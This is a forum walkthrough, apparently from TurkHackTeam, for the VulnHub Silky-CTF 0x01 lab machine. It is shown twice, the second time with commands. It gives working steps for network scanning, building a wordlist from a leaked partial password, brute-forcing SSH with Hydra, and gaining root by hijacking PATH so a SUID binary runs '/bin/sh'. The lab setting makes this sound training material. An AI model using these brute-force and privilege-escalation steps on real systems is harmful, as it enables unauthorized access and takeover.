Hi TurkHackTeam Family, I'll show you "How to Solve Silky-CTF: 0x01 Vulnerability Machine" today.
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn to Machine's IP adress, type:
We learned IP address of our target with this.
To learn which ports are open by NMAP scanning, type:
As you can see 22 and 80 ports are opened and what important in here is robots.txt and notex.txt which i was particularly showed with blue color.
I understand it was a website because 80 port are opened. When I go to website I can see this is a website apache-based website.
First, I went to robots.txt, it forwarded me to notex.txt. There is a text in Deutsch.
When we translate It, I see this message "I absolutely have to remote the password from the page, after all, the last 2 characters are missing. But still.".
Next, i back to website and I looked to codes and I found somethings in "script.js" file.
As you can see we found some values about password.
"Password's last 2 letters lost" gave us a hint.
I'll create password list with crunch tool.
I wrote this in terminal and password list created.
We'll brute attack to SSH service with Hydra tool, type the following code to the Terminal:
Now we got the password.
To connect as SSH, type:
I searched for SUID featured files and /usr/bin/sky file caught my eye.
I wrote this and saw some Deutsch texts and the word of root.
I already ran whoami command.
To Boost to root, I'll use PATH variant. For this:
In a kind of funny way, i didn't get root boost by typing "id".
But when i type the above code, i didn't get any error about permissions and got my flag.
/Translation Club M3m0ry\
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn to Machine's IP adress, type:
Kod:
sudo netdiscover
We learned IP address of our target with this.
To learn which ports are open by NMAP scanning, type:
Kod:
nmap -A IP_ADDRESS
As you can see 22 and 80 ports are opened and what important in here is robots.txt and notex.txt which i was particularly showed with blue color.
I understand it was a website because 80 port are opened. When I go to website I can see this is a website apache-based website.
First, I went to robots.txt, it forwarded me to notex.txt. There is a text in Deutsch.
When we translate It, I see this message "I absolutely have to remote the password from the page, after all, the last 2 characters are missing. But still.".
Next, i back to website and I looked to codes and I found somethings in "script.js" file.
As you can see we found some values about password.
"Password's last 2 letters lost" gave us a hint.
I'll create password list with crunch tool.
Kod:
crunch 7 7 -t s1lKy^% >> password.txt
I wrote this in terminal and password list created.
We'll brute attack to SSH service with Hydra tool, type the following code to the Terminal:
Kod:
hydra -l silky -P password.txt IP_ADRES ssh
Now we got the password.
To connect as SSH, type:
Kod:
ssh silky@IP_ADDRESS
I searched for SUID featured files and /usr/bin/sky file caught my eye.
Kod:
/usr/bin/sky
I wrote this and saw some Deutsch texts and the word of root.
I already ran whoami command.
To Boost to root, I'll use PATH variant. For this:
Kod:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
In a kind of funny way, i didn't get root boost by typing "id".
Kod:
cd /root
But when i type the above code, i didn't get any error about permissions and got my flag.
/Translation Club M3m0ry\
Son düzenleme: